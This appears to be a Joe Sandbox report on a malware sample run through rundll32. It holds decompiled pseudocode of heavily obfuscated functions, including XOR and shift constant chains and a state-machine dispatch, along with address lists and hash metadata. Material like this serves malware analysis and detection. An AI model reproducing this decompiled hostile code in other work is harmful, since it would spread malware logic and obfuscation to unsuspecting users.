                                                                        				_v1720 = _v1720 | 0xcb6149df;
                                                                        				_v1720 = _v1720 ^ 0xcb61901b;
                                                                        				_v1676 = 0x443b;
                                                                        				_v1676 = _v1676 ^ 0xd199ed1f;
                                                                        				_v1676 = _v1676 >> 2;
                                                                        				_v1676 = _v1676 ^ 0x34667475;
                                                                        				_v1608 = 0x7ce3;
                                                                        				_v1608 = _v1608 ^ 0x2b9fed51;
                                                                        				_v1608 = _v1608 ^ 0x2b9fdb73;
                                                                        				_v1728 = 0xb946;
                                                                        				_v1728 = _v1728 * 0x68;
                                                                        				_v1728 = _v1728 * 0x6e;
                                                                        				_v1728 = _v1728 << 0xe;
                                                                        				_v1728 = _v1728 ^ 0xda080bad;
                                                                        				_v1712 = 0xe175;
                                                                        				_v1712 = _v1712 / _t524;
                                                                        				_t525 = 0x68;
                                                                        				_v1712 = _v1712 * 0x62;
                                                                        				_v1712 = _v1712 | 0xebea7309;
                                                                        				_v1712 = _v1712 ^ 0xebebb48d;
                                                                        				_v1736 = 0xa5be;
                                                                        				_v1736 = _v1736 + 0xffff1e6a;
                                                                        				_v1736 = _v1736 >> 8;
                                                                        				_v1736 = _v1736 ^ 0xa9a874dc;
                                                                        				_v1736 = _v1736 ^ 0xa957bb08;
                                                                        				_v1704 = 0x444d;
                                                                        				_t180 =  &_v1704; // 0x444d
                                                                        				_v1704 =  *_t180 * 0x38;
                                                                        				_v1704 = _v1704 | 0xc313ec5d;
                                                                        				_v1704 = _v1704 + 0xffffc096;
                                                                        				_v1704 = _v1704 ^ 0xc31fa060;
                                                                        				_v1668 = 0x6d52;
                                                                        				_t189 =  &_v1668; // 0x6d52
                                                                        				_v1668 =  *_t189 * 0x65;
                                                                        				_v1668 = _v1668 ^ 0xbf90cb27;
                                                                        				_v1668 = _v1668 ^ 0xbfbbe0fd;
                                                                        				_v1584 = 0x2582;
                                                                        				_v1584 = _v1584 ^ 0xe6613b83;
                                                                        				_v1584 = _v1584 ^ 0xe6615551;
                                                                        				_v1764 = 0x94b;
                                                                        				_v1764 = _v1764 + 0x67c4;
                                                                        				_v1764 = _v1764 / _t525;
                                                                        				_v1764 = _v1764 >> 3;
                                                                        				_v1764 = _v1764 ^ 0x00001cca;
                                                                        				_v1688 = 0x9e3b;
                                                                        				_v1688 = _v1688 + 0x5941;
                                                                        				_v1688 = _v1688 << 2;
                                                                        				_v1688 = _v1688 ^ 0x0003cfbe;
                                                                        				_v1748 = 0x3388;
                                                                        				_v1748 = _v1748 >> 0xf;
                                                                        				_v1748 = _v1748 ^ 0x81f115bf;
                                                                        				_v1748 = _v1748 + 0xffff7117;
                                                                        				_v1748 = _v1748 ^ 0x81f0c6d8;
                                                                        				_v1620 = 0xeec5;
                                                                        				_v1620 = _v1620 ^ 0x04d4525c;
                                                                        				_v1620 = _v1620 ^ 0x04d4ab65;
                                                                        				_v1624 = 0xdb2c;
                                                                        				_v1624 = _v1624 << 1;
                                                                        				_v1624 = _v1624 ^ 0x0001fe72;
                                                                        				_v1580 = 0xb060;
                                                                        				_v1580 = _v1580 + 0xae2;
                                                                        				_v1580 = _v1580 ^ 0x0000f768;
                                                                        				_v1660 = 0x96fa;
                                                                        				_v1660 = _v1660 << 5;
                                                                        				_v1660 = _v1660 | 0x6168c04a;
                                                                        				_v1660 = _v1660 ^ 0x617aedf0;
                                                                        				_v1672 = 0x7987;
                                                                        				_v1672 = _v1672 | 0xba6a9da0;
                                                                        				_v1672 = _v1672 + 0x37d3;
                                                                        				_v1672 = _v1672 ^ 0xba6b374e;
                                                                        				_v1680 = 0x436a;
                                                                        				_v1680 = _v1680 + 0xffff28b9;
                                                                        				_v1680 = _v1680 ^ 0xc211608a;
                                                                        				_v1680 = _v1680 ^ 0x3dee43d2;
                                                                        				_v1740 = 0x7dd0;
                                                                        				_v1740 = _v1740 ^ 0x30cdb3c0;
                                                                        				_v1740 = _v1740 ^ 0xa86be54c;
                                                                        				_v1740 = _v1740 + 0xffffb5e9;
                                                                        				_v1740 = _v1740 ^ 0x98a5bc8c;
                                                                        				_v1612 = 0x1a91;
                                                                        				_v1612 = _v1612 << 0xe;
                                                                        				_v1612 = _v1612 ^ 0x06a46876;
                                                                        				_v1664 = 0x6ac2;
                                                                        				_v1664 = _v1664 ^ 0xd8b61fc6;
                                                                        				_v1664 = _v1664 ^ 0x1ea3be60;
                                                                        				_v1664 = _v1664 ^ 0xc615e743;
                                                                        				_v1732 = 0x55c4;
                                                                        				_v1732 = _v1732 >> 0xf;
                                                                        				_v1732 = _v1732 + 0xffffedaa;
                                                                        				_t526 = 0xa;
                                                                        				_v1732 = _v1732 * 0x58;
                                                                        				_v1732 = _v1732 ^ 0xfff9af4a;
                                                                        				_v1604 = 0x92de;
                                                                        				_v1604 = _v1604 >> 8;
                                                                        				_v1604 = _v1604 ^ 0x000052ef;
                                                                        				_v1640 = 0x375a;
                                                                        				_v1640 = _v1640 ^ 0x8d7c695b;
                                                                        				_t527 = 0x12;
                                                                        				_v1640 = _v1640 / _t526;
                                                                        				_v1640 = _v1640 ^ 0x0e263cba;
                                                                        				_v1708 = 0xa848;
                                                                        				_v1708 = _v1708 << 2;
                                                                        				_v1708 = _v1708 + 0xffff4f47;
                                                                        				_v1708 = _v1708 >> 0x10;
                                                                        				_v1708 = _v1708 ^ 0x00004df5;
                                                                        				_v1716 = 0x3304;
                                                                        				_v1716 = _v1716 ^ 0x61e3d3e4;
                                                                        				_v1716 = _v1716 + 0x5bdd;
                                                                        				_v1716 = _v1716 + 0xffffa59f;
                                                                        				_v1716 = _v1716 ^ 0x61e3ceb5;
                                                                        				_v1648 = 0x6dc4;
                                                                        				_v1648 = _v1648 | 0x8611d38f;
                                                                        				_v1648 = _v1648 << 8;
                                                                        				_v1648 = _v1648 ^ 0x11ffcc6f;
                                                                        				_v1656 = 0x328f;
                                                                        				_v1656 = _v1656 * 0x7c;
                                                                        				_v1656 = _v1656 + 0xeaba;
                                                                        				_v1656 = _v1656 ^ 0x00191fbe;
                                                                        				_v1632 = 0x61f7;
                                                                        				_v1632 = _v1632 / _t527;
                                                                        				_t528 = 0x58;
                                                                        				_v1632 = _v1632 / _t528;
                                                                        				_v1632 = _v1632 ^ 0x00002538;
                                                                        				_v1692 = 0x1be6;
                                                                        				_v1692 = _v1692 | 0x9feafdcd;
                                                                        				_v1692 = _v1692 << 2;
                                                                        				_v1692 = _v1692 | 0x8d482522;
                                                                        				_v1692 = _v1692 ^ 0xffebf3eb;
                                                                        				_v1700 = 0x9b1b;
                                                                        				_t529 = 0x31;
                                                                        				_t516 = _v1576;
                                                                        				_v1700 = _v1700 / _t529;
                                                                        				_v1700 = _v1700 * 0x73;
                                                                        				_v1700 = _v1700 << 0xe;
                                                                        				_v1700 = _v1700 ^ 0x5af7f17e;
                                                                        				_v1724 = 0xca47;
                                                                        				_v1724 = _v1724 << 0xd;
                                                                        				_v1724 = _v1724 >> 5;
                                                                        				_v1724 = _v1724 + 0xd0a1;
                                                                        				_v1724 = _v1724 ^ 0x00cb17a0;
                                                                        				while(1) {
                                                                        					L1:
                                                                        					_t530 = 0x5c;
                                                                        					while(1) {
                                                                        						L2:
                                                                        						_t493 = 0x6df7a4c;
                                                                        						do {
                                                                        							L3:
                                                                        							if(_t581 == _t493) {
                                                                        								_t495 = E1001BBAB(_v1664, _v1732,  &_v1560, _v1604);
                                                                        								_pop(_t533);
                                                                        								_t497 = E1001EC06(_v1640,  &_v1560, _v1708, _t516, _v1572, _t533, _v1716, _v1648, 2 + _t495 * 2, _v1724, _v1656);
                                                                        								_t586 =  &(_t586[9]);
                                                                        								__eflags = _t497;
                                                                        								_t581 = 0x2a46bc81;
                                                                        								_t448 = _t497 == 0;
                                                                        								__eflags = _t448;
                                                                        								_v1576 = 0 | _t448;
                                                                        								goto L17;
                                                                        							} else {
                                                                        								if(_t581 == 0xbbbecbf) {
                                                                        									_t518 =  *0x100221b0 + 0x10;
                                                                        									while(1) {
                                                                        										__eflags =  *_t518 - _t530;
                                                                        										if(__eflags == 0) {
                                                                        											break;
                                                                        										}
                                                                        										_t518 = _t518 + 2;
                                                                        										__eflags = _t518;
                                                                        									}
                                                                        									_t516 = _t518 + 2;
                                                                        									_t581 = 0x2529a265;
                                                                        									goto L2;
                                                                        								} else {
                                                                        									if(_t581 == 0x2529a265) {
                                                                        										_push(0x10001080);
                                                                        										_push(_v1764);
                                                                        										_t499 = E1001BF25(_v1668, _v1584, __eflags);
                                                                        										_pop(_t539);
                                                                        										_t425 =  &_v1624; // 0xe6615551
                                                                        										__eflags = E10013659(_v1688, _v1748, _v1620,  *_t425, _v1580, _t539,  &_v1572, _v1660, _t539, _t539, _t499, _t539, _v1756, _v1636);
                                                                        										_t581 =  ==  ? 0x6df7a4c : 0x1cdd012f;
                                                                        										E1001C5F7(_v1672, _v1680, _v1740, _v1612, _t499);
                                                                        										_t586 =  &(_t586[0x10]);
                                                                        										L17:
                                                                        										_t493 = 0x6df7a4c;
                                                                        										_t530 = 0x5c;
                                                                        										goto L18;
                                                                        									} else {
                                                                        										if(_t581 == 0x2a46bc81) {
                                                                        											E10015483(_v1632, _v1692, _v1700, _v1572);
                                                                        										} else {
                                                                        											if(_t581 == 0x2a61740b) {
                                                                        												_push(0x10001020);
                                                                        												_push(_v1596);
                                                                        												_t505 = E1001BF25(_v1752, _v1644, __eflags);
                                                                        												E100173C0( &_v1040, __eflags);
                                                                        												E10003482(_v1600, __eflags,  &_v520,  &_v1560, _v1744, _v1592,  &_v1040,  *0x100221b0 + 0x234, 0x104,  *0x100221b0 + 0x10, _t505, _v1720, _v1676, _v1608);
                                                                        												E1001C5F7(_v1728, _v1712, _v1736, _v1704, _t505);
                                                                        												_t586 =  &(_t586[0x11]);
                                                                        												_t581 = 0xbbbecbf;
                                                                        												goto L1;
                                                                        											} else {
                                                                        												if(_t581 != 0x3875c21b) {
                                                                        													goto L18;
                                                                        												} else {
                                                                        													_push(_t530);
                                                                        													E10001D54(_v1684, _t530, _v1628, _v1696, _v1760,  &_v520, _v1588, _v1616);
                                                                        													_t586 =  &(_t586[8]);
                                                                        													_t581 = 0x2a61740b;
                                                                        													while(1) {
                                                                        														L1:
                                                                        														_t530 = 0x5c;
                                                                        														L2:
                                                                        														_t493 = 0x6df7a4c;
                                                                        														goto L3;
                                                                        													}
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							L21:
                                                                        							return _v1576;
                                                                        							L18:
                                                                        							__eflags = _t581 - 0x1cdd012f;
                                                                        						} while (__eflags != 0);
                                                                        						goto L21;
                                                                        					}
                                                                        				}
                                                                        			}

                                                                        0x1001f564
                                                                        0x1001f56f
                                                                        0x1001f577
                                                                        0x1001f57c
                                                                        0x1001f581
                                                                        0x1001f589
                                                                        0x1001f591
                                                                        0x1001f5a3
                                                                        0x1001f5a6
                                                                        0x1001f5ad
                                                                        0x1001f5b8
                                                                        0x1001f5c3
                                                                        0x1001f5ce
                                                                        0x1001f5d9
                                                                        0x1001f5e4
                                                                        0x1001f5ef
                                                                        0x1001f5f7
                                                                        0x1001f5ff
                                                                        0x1001f60a
                                                                        0x1001f620
                                                                        0x1001f625
                                                                        0x1001f62e
                                                                        0x1001f639
                                                                        0x1001f646
                                                                        0x1001f649
                                                                        0x1001f652
                                                                        0x1001f65b
                                                                        0x1001f65f
                                                                        0x1001f667
                                                                        0x1001f672
                                                                        0x1001f67a
                                                                        0x1001f685
                                                                        0x1001f68d
                                                                        0x1001f695
                                                                        0x1001f699
                                                                        0x1001f6a1
                                                                        0x1001f6a9
                                                                        0x1001f6b1
                                                                        0x1001f6b9
                                                                        0x1001f6be
                                                                        0x1001f6c6
                                                                        0x1001f6d1
                                                                        0x1001f6dc
                                                                        0x1001f6e7
                                                                        0x1001f6f4
                                                                        0x1001f6fd
                                                                        0x1001f701
                                                                        0x1001f706
                                                                        0x1001f70e
                                                                        0x1001f71e
                                                                        0x1001f727
                                                                        0x1001f728
                                                                        0x1001f72c
                                                                        0x1001f734
                                                                        0x1001f73c
                                                                        0x1001f744
                                                                        0x1001f74c
                                                                        0x1001f751
                                                                        0x1001f759
                                                                        0x1001f761
                                                                        0x1001f769
                                                                        0x1001f76e
                                                                        0x1001f772
                                                                        0x1001f77a
                                                                        0x1001f782
                                                                        0x1001f78a
                                                                        0x1001f792
                                                                        0x1001f797
                                                                        0x1001f79b
                                                                        0x1001f7a3
                                                                        0x1001f7ab
                                                                        0x1001f7b6
                                                                        0x1001f7c1
                                                                        0x1001f7cc
                                                                        0x1001f7d4
                                                                        0x1001f7e2
                                                                        0x1001f7e6
                                                                        0x1001f7eb
                                                                        0x1001f7f3
                                                                        0x1001f7fb
                                                                        0x1001f803
                                                                        0x1001f808
                                                                        0x1001f812
                                                                        0x1001f81a
                                                                        0x1001f81f
                                                                        0x1001f827
                                                                        0x1001f82f
                                                                        0x1001f837
                                                                        0x1001f842
                                                                        0x1001f84d
                                                                        0x1001f858
                                                                        0x1001f863
                                                                        0x1001f86a
                                                                        0x1001f875
                                                                        0x1001f880
                                                                        0x1001f88b
                                                                        0x1001f896
                                                                        0x1001f89e
                                                                        0x1001f8a3
                                                                        0x1001f8ab
                                                                        0x1001f8b3
                                                                        0x1001f8bb
                                                                        0x1001f8c3
                                                                        0x1001f8cb
                                                                        0x1001f8d3
                                                                        0x1001f8db
                                                                        0x1001f8e3
                                                                        0x1001f8eb
                                                                        0x1001f8f3
                                                                        0x1001f8fb
                                                                        0x1001f903
                                                                        0x1001f90b
                                                                        0x1001f913
                                                                        0x1001f91b
                                                                        0x1001f926
                                                                        0x1001f92e
                                                                        0x1001f939
                                                                        0x1001f941
                                                                        0x1001f949
                                                                        0x1001f951
                                                                        0x1001f959
                                                                        0x1001f961
                                                                        0x1001f966
                                                                        0x1001f975
                                                                        0x1001f978
                                                                        0x1001f97c
                                                                        0x1001f984
                                                                        0x1001f98f
                                                                        0x1001f997
                                                                        0x1001f9a2
                                                                        0x1001f9ad
                                                                        0x1001f9c1
                                                                        0x1001f9c2
                                                                        0x1001f9c9
                                                                        0x1001f9d4
                                                                        0x1001f9dc
                                                                        0x1001f9e1
                                                                        0x1001f9e9
                                                                        0x1001f9ee
                                                                        0x1001f9f6
                                                                        0x1001f9fe
                                                                        0x1001fa06
                                                                        0x1001fa0e
                                                                        0x1001fa16
                                                                        0x1001fa1e
                                                                        0x1001fa29
                                                                        0x1001fa34
                                                                        0x1001fa3c
                                                                        0x1001fa47
                                                                        0x1001fa54
                                                                        0x1001fa58
                                                                        0x1001fa60
                                                                        0x1001fa6a
                                                                        0x1001fa80
                                                                        0x1001fa95
                                                                        0x1001fa9a
                                                                        0x1001faa3
                                                                        0x1001faae
                                                                        0x1001fab6
                                                                        0x1001fabe
                                                                        0x1001fac3
                                                                        0x1001facb
                                                                        0x1001fad3
                                                                        0x1001fadf
                                                                        0x1001fae2
                                                                        0x1001fae9
                                                                        0x1001faf2
                                                                        0x1001faf6
                                                                        0x1001fafb
                                                                        0x1001fb03
                                                                        0x1001fb0b
                                                                        0x1001fb10
                                                                        0x1001fb15
                                                                        0x1001fb1d
                                                                        0x1001fb25
                                                                        0x1001fb25
                                                                        0x1001fb27
                                                                        0x1001fb28
                                                                        0x1001fb28
                                                                        0x1001fb28
                                                                        0x1001fb2d
                                                                        0x1001fb2d
                                                                        0x1001fb2f
                                                                        0x1001fd1d
                                                                        0x1001fd23
                                                                        0x1001fd5a
                                                                        0x1001fd61
                                                                        0x1001fd64
                                                                        0x1001fd66
                                                                        0x1001fd6b
                                                                        0x1001fd6b
                                                                        0x1001fd6e
                                                                        0x00000000
                                                                        0x1001fb35
                                                                        0x1001fb3b
                                                                        0x1001fcef
                                                                        0x1001fcf7
                                                                        0x1001fcf7
                                                                        0x1001fcfa
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001fcf4
                                                                        0x1001fcf4
                                                                        0x1001fcf4
                                                                        0x1001fcfc
                                                                        0x1001fcff
                                                                        0x00000000
                                                                        0x1001fb41
                                                                        0x1001fb43
                                                                        0x1001fc52
                                                                        0x1001fc57
                                                                        0x1001fc66
                                                                        0x1001fc6c
                                                                        0x1001fc95
                                                                        0x1001fcbb
                                                                        0x1001fcd9
                                                                        0x1001fcdc
                                                                        0x1001fce1
                                                                        0x1001fd75
                                                                        0x1001fd77
                                                                        0x1001fd7c
                                                                        0x00000000
                                                                        0x1001fb49
                                                                        0x1001fb4f
                                                                        0x1001fda1
                                                                        0x1001fb55
                                                                        0x1001fb5b
                                                                        0x1001fba3
                                                                        0x1001fba8
                                                                        0x1001fbba
                                                                        0x1001fbc8
                                                                        0x1001fc24
                                                                        0x1001fc40
                                                                        0x1001fc45
                                                                        0x1001fc48
                                                                        0x00000000
                                                                        0x1001fb5d
                                                                        0x1001fb63
                                                                        0x00000000
                                                                        0x1001fb69
                                                                        0x1001fb69
                                                                        0x1001fb94
                                                                        0x1001fb99
                                                                        0x1001fb9c
                                                                        0x1001fb25
                                                                        0x1001fb25
                                                                        0x1001fb27
                                                                        0x1001fb28
                                                                        0x1001fb28
                                                                        0x00000000
                                                                        0x1001fb28
                                                                        0x1001fb25
                                                                        0x1001fb63
                                                                        0x1001fb5b
                                                                        0x1001fb4f
                                                                        0x1001fb43
                                                                        0x1001fb3b
                                                                        0x1001fda8
                                                                        0x1001fdb9
                                                                        0x1001fd7d
                                                                        0x1001fd7d
                                                                        0x1001fd7d
                                                                        0x00000000
                                                                        0x1001fd89
                                                                        0x1001fb28

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: s$1{$8%$AY$Bp$K$MDu$QUa$Rmutf4$Z7$jC$n9$utf4$u$R$|
                                                                        • API String ID: 0-2491655032
                                                                        • Opcode ID: 4044c3afec894246fee1f662e1da1731f593b194fe46b34393316257da5b73b0
                                                                        • Instruction ID: bb0f35014981fe5b56090f270f76ab9b3438ccc7679621ff333ea9736163f667
                                                                        • Opcode Fuzzy Hash: 4044c3afec894246fee1f662e1da1731f593b194fe46b34393316257da5b73b0
                                                                        • Instruction Fuzzy Hash: 6B32D37150C3809FE369CF25C98AA9FBBE2FBC5354F10891DE19A862A0D7B59549CF03
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 98%
                                                                        			E1000F813() {
                                                                        				char _v520;
                                                                        				char _v1040;
                                                                        				char _v1560;
                                                                        				signed int _v1564;
                                                                        				signed int _v1568;
                                                                        				signed int _v1572;
                                                                        				intOrPtr* _v1576;
                                                                        				signed int _v1580;
                                                                        				signed int _v1584;
                                                                        				signed int _v1588;
                                                                        				signed int _v1592;
                                                                        				signed int _v1596;
                                                                        				signed int _v1600;
                                                                        				signed int _v1604;
                                                                        				signed int _v1608;
                                                                        				signed int _v1612;
                                                                        				unsigned int _v1616;
                                                                        				signed int _v1620;
                                                                        				signed int _v1624;
                                                                        				signed int _v1628;
                                                                        				signed int _v1632;
                                                                        				signed int _v1636;
                                                                        				signed int _v1640;
                                                                        				signed int _v1644;
                                                                        				signed int _v1648;
                                                                        				signed int _v1652;
                                                                        				signed int _v1656;
                                                                        				signed int _v1660;
                                                                        				signed int _v1664;
                                                                        				signed int _v1668;
                                                                        				signed int _v1672;
                                                                        				signed int _v1676;
                                                                        				signed int _v1680;
                                                                        				signed int _v1684;
                                                                        				signed int _v1688;
                                                                        				signed int _v1692;
                                                                        				signed int _v1696;
                                                                        				signed int _v1700;
                                                                        				signed int _v1704;
                                                                        				signed int _v1708;
                                                                        				signed int _v1712;
                                                                        				signed int _v1716;
                                                                        				signed int _v1720;
                                                                        				signed int _v1724;
                                                                        				signed int _v1728;
                                                                        				signed int _v1732;
                                                                        				signed int _v1736;
                                                                        				signed int _v1740;
                                                                        				signed int _v1744;
                                                                        				signed int _v1748;
                                                                        				signed int _v1752;
                                                                        				signed int _v1756;
                                                                        				signed int _v1760;
                                                                        				signed int _v1764;
                                                                        				signed int _v1768;
                                                                        				signed int _v1772;
                                                                        				intOrPtr* _t473;
                                                                        				void* _t479;
                                                                        				intOrPtr* _t489;
                                                                        				void* _t491;
                                                                        				void* _t522;
                                                                        				signed int _t530;
                                                                        				signed int _t531;
                                                                        				signed int _t532;
                                                                        				signed int _t533;
                                                                        				signed int _t534;
                                                                        				signed int _t535;
                                                                        				signed int _t536;
                                                                        				signed int _t537;
                                                                        				signed int _t538;
                                                                        				signed int _t539;
                                                                        				intOrPtr _t540;
                                                                        				intOrPtr* _t542;
                                                                        				intOrPtr* _t543;
                                                                        				signed int* _t547;
                                                                        				void* _t550;
                                                                        
                                                                        				_t547 =  &_v1772;
                                                                        				_v1564 = 0xa43e;
                                                                        				_v1564 = _v1564 ^ 0x45b26b29;
                                                                        				_t491 = 0x29fd4c8c;
                                                                        				_v1564 = _v1564 ^ 0x45b2cf3e;
                                                                        				_v1604 = 0xd832;
                                                                        				_v1604 = _v1604 << 7;
                                                                        				_v1604 = _v1604 ^ 0x006c754a;
                                                                        				_v1676 = 0xea82;
                                                                        				_v1676 = _v1676 | 0xeffbbfdd;
                                                                        				_v1676 = _v1676 ^ 0xeffbe896;
                                                                        				_v1744 = 0x2481;
                                                                        				_v1744 = _v1744 << 6;
                                                                        				_v1744 = _v1744 + 0x9ec7;
                                                                        				_v1744 = _v1744 + 0x8a8;
                                                                        				_v1744 = _v1744 ^ 0x0009f1d1;
                                                                        				_v1580 = 0x9f5;
                                                                        				_v1580 = _v1580 | 0x253f9e02;
                                                                        				_v1580 = _v1580 ^ 0x253fa85d;
                                                                        				_v1612 = 0xe62c;
                                                                        				_v1612 = _v1612 ^ 0xf7e1e6dc;
                                                                        				_v1612 = _v1612 ^ 0xf7e121db;
                                                                        				_v1644 = 0xa597;
                                                                        				_v1644 = _v1644 << 3;
                                                                        				_v1644 = _v1644 ^ 0x00057224;
                                                                        				_v1636 = 0x74cb;
                                                                        				_v1636 = _v1636 | 0x8dfb5c1d;
                                                                        				_v1636 = _v1636 ^ 0x8dfb1908;
                                                                        				_v1672 = 0xf927;
                                                                        				_t530 = 0x47;
                                                                        				_v1672 = _v1672 / _t530;
                                                                        				_v1672 = _v1672 << 8;
                                                                        				_t543 = 0;
                                                                        				_v1672 = _v1672 ^ 0x0003eef2;
                                                                        				_v1684 = 0xe8df;
                                                                        				_v1684 = _v1684 ^ 0xe48f8edf;
                                                                        				_t531 = 0x4b;
                                                                        				_v1576 = 0;
                                                                        				_v1684 = _v1684 * 0xe;
                                                                        				_v1684 = _v1684 ^ 0x7fd7efbf;
                                                                        				_v1572 = 0xd38b;
                                                                        				_v1572 = _v1572 | 0x212f5c39;
                                                                        				_v1572 = _v1572 ^ 0x212fa689;
                                                                        				_v1652 = 0x1200;
                                                                        				_v1652 = _v1652 / _t531;
                                                                        				_v1652 = _v1652 ^ 0x00000a2b;
                                                                        				_v1596 = 0x13dd;
                                                                        				_v1596 = _v1596 | 0xceb868f3;
                                                                        				_v1596 = _v1596 ^ 0xceb84d66;
                                                                        				_v1768 = 0x3bb1;
                                                                        				_v1768 = _v1768 + 0xffff0d17;
                                                                        				_v1768 = _v1768 >> 7;
                                                                        				_v1768 = _v1768 >> 6;
                                                                        				_v1768 = _v1768 ^ 0x0007e300;
                                                                        				_v1716 = 0xf0d2;
                                                                        				_v1716 = _v1716 + 0xe075;
                                                                        				_v1716 = _v1716 ^ 0x9b47385c;
                                                                        				_v1716 = _v1716 ^ 0x9b46cdd4;
                                                                        				_v1660 = 0x69dd;
                                                                        				_v1660 = _v1660 | 0x8bdea621;
                                                                        				_v1660 = _v1660 << 0x10;
                                                                        				_v1660 = _v1660 ^ 0xeffd1439;
                                                                        				_v1760 = 0x4063;
                                                                        				_v1760 = _v1760 << 6;
                                                                        				_v1760 = _v1760 * 0x7c;
                                                                        				_v1760 = _v1760 ^ 0xd256c198;
                                                                        				_v1760 = _v1760 ^ 0xd59d1bc0;
                                                                        				_v1628 = 0x90dd;
                                                                        				_v1628 = _v1628 + 0xffff497e;
                                                                        				_v1628 = _v1628 ^ 0xffffd705;
                                                                        				_v1736 = 0xfcae;
                                                                        				_t532 = 0x46;
                                                                        				_v1736 = _v1736 / _t532;
                                                                        				_v1736 = _v1736 + 0xcadb;
                                                                        				_v1736 = _v1736 ^ 0x517b85fd;
                                                                        				_v1736 = _v1736 ^ 0x517b3d77;
                                                                        				_v1708 = 0xaa4c;
                                                                        				_t533 = 0xd;
                                                                        				_v1708 = _v1708 * 0x56;
                                                                        				_v1708 = _v1708 | 0x843164d5;
                                                                        				_v1708 = _v1708 ^ 0x84391434;
                                                                        				_v1688 = 0x7b92;
                                                                        				_v1688 = _v1688 + 0x23d3;
                                                                        				_v1688 = _v1688 | 0xa0cceb2c;
                                                                        				_v1688 = _v1688 ^ 0xa0ccf5a5;
                                                                        				_v1696 = 0x2f42;
                                                                        				_v1696 = _v1696 + 0xffffada6;
                                                                        				_v1696 = _v1696 + 0xffffd11c;
                                                                        				_v1696 = _v1696 ^ 0xffff8010;
                                                                        				_v1704 = 0x664;
                                                                        				_v1704 = _v1704 << 6;
                                                                        				_v1704 = _v1704 << 4;
                                                                        				_v1704 = _v1704 ^ 0x001991ab;
                                                                        				_v1600 = 0x17c3;
                                                                        				_v1600 = _v1600 * 0x6e;
                                                                        				_v1600 = _v1600 ^ 0x000a4796;
                                                                        				_v1756 = 0x876e;
                                                                        				_v1756 = _v1756 ^ 0xccadfb01;
                                                                        				_v1756 = _v1756 / _t533;
                                                                        				_v1756 = _v1756 | 0x71b05a4c;
                                                                        				_v1756 = _v1756 ^ 0x7fbe83ae;
                                                                        				_v1608 = 0xc50f;
                                                                        				_t534 = 0x7e;
                                                                        				_v1608 = _v1608 / _t534;
                                                                        				_v1608 = _v1608 ^ 0x00000e7d;
                                                                        				_v1712 = 0xe559;
                                                                        				_v1712 = _v1712 | 0xff7f7fff;
                                                                        				_v1712 = _v1712 ^ 0xff7fd517;
                                                                        				_v1720 = 0x1170;
                                                                        				_v1720 = _v1720 * 0x2e;
                                                                        				_v1720 = _v1720 | 0xa70aa585;
                                                                        				_v1720 = _v1720 ^ 0xa70bab82;
                                                                        				_v1724 = 0x666c;
                                                                        				_v1724 = _v1724 | 0x8fee4b7f;
                                                                        				_v1724 = _v1724 ^ 0x8fee281e;
                                                                        				_v1772 = 0xf606;
                                                                        				_v1772 = _v1772 ^ 0x11a63a32;
                                                                        				_v1772 = _v1772 >> 1;
                                                                        				_v1772 = _v1772 | 0xbd41a285;
                                                                        				_v1772 = _v1772 ^ 0xbdd3c841;
                                                                        				_v1624 = 0xc87;
                                                                        				_v1624 = _v1624 << 8;
                                                                        				_v1624 = _v1624 ^ 0x000cb845;
                                                                        				_v1632 = 0xcf71;
                                                                        				_v1632 = _v1632 + 0x859a;
                                                                        				_v1632 = _v1632 ^ 0x000172a0;
                                                                        				_v1640 = 0x9b4e;
                                                                        				_v1640 = _v1640 + 0xfffffeb0;
                                                                        				_v1640 = _v1640 ^ 0x0000b068;
                                                                        				_v1752 = 0x51f0;
                                                                        				_v1752 = _v1752 << 0xd;
                                                                        				_v1752 = _v1752 * 9;
                                                                        				_v1752 = _v1752 ^ 0xa73676e0;
                                                                        				_v1752 = _v1752 ^ 0xfb182fbc;
                                                                        				_v1568 = 0x8b8;
                                                                        				_v1568 = _v1568 | 0x4447cdf9;
                                                                        				_v1568 = _v1568 ^ 0x4447aa39;
                                                                        				_v1732 = 0xaa2a;
                                                                        				_t535 = 0x4c;
                                                                        				_v1732 = _v1732 / _t535;
                                                                        				_v1732 = _v1732 >> 7;
                                                                        				_v1732 = _v1732 | 0x5d199c15;
                                                                        				_v1732 = _v1732 ^ 0x5d19ea5e;
                                                                        				_v1740 = 0x9be5;
                                                                        				_v1740 = _v1740 ^ 0x27ebeb7e;
                                                                        				_v1740 = _v1740 >> 6;
                                                                        				_v1740 = _v1740 << 0xc;
                                                                        				_v1740 = _v1740 ^ 0xfadc41bb;
                                                                        				_v1748 = 0xab1f;
                                                                        				_v1748 = _v1748 >> 0xd;
                                                                        				_v1748 = _v1748 | 0x2e03c9c9;
                                                                        				_t536 = 0x78;
                                                                        				_v1748 = _v1748 * 0x61;
                                                                        				_v1748 = _v1748 ^ 0x6f6f6458;
                                                                        				_v1680 = 0x432d;
                                                                        				_v1680 = _v1680 << 9;
                                                                        				_v1680 = _v1680 + 0xaa9a;
                                                                        				_v1680 = _v1680 ^ 0x008720ae;
                                                                        				_v1620 = 0xb695;
                                                                        				_v1620 = _v1620 | 0x9c0d8b30;
                                                                        				_v1620 = _v1620 ^ 0x9c0dd91b;
                                                                        				_v1700 = 0x7cda;
                                                                        				_v1700 = _v1700 / _t536;
                                                                        				_v1700 = _v1700 << 5;
                                                                        				_v1700 = _v1700 ^ 0x00004203;
                                                                        				_v1668 = 0xca1;
                                                                        				_v1668 = _v1668 << 6;
                                                                        				_v1668 = _v1668 + 0xfb4a;
                                                                        				_v1668 = _v1668 ^ 0x00041992;
                                                                        				_v1588 = 0x2832;
                                                                        				_v1588 = _v1588 + 0xffff4b77;
                                                                        				_v1588 = _v1588 ^ 0xffff7d0e;
                                                                        				_v1584 = 0xd717;
                                                                        				_v1584 = _v1584 + 0x8534;
                                                                        				_v1584 = _v1584 ^ 0x00011bb2;
                                                                        				_v1656 = 0x6f3e;
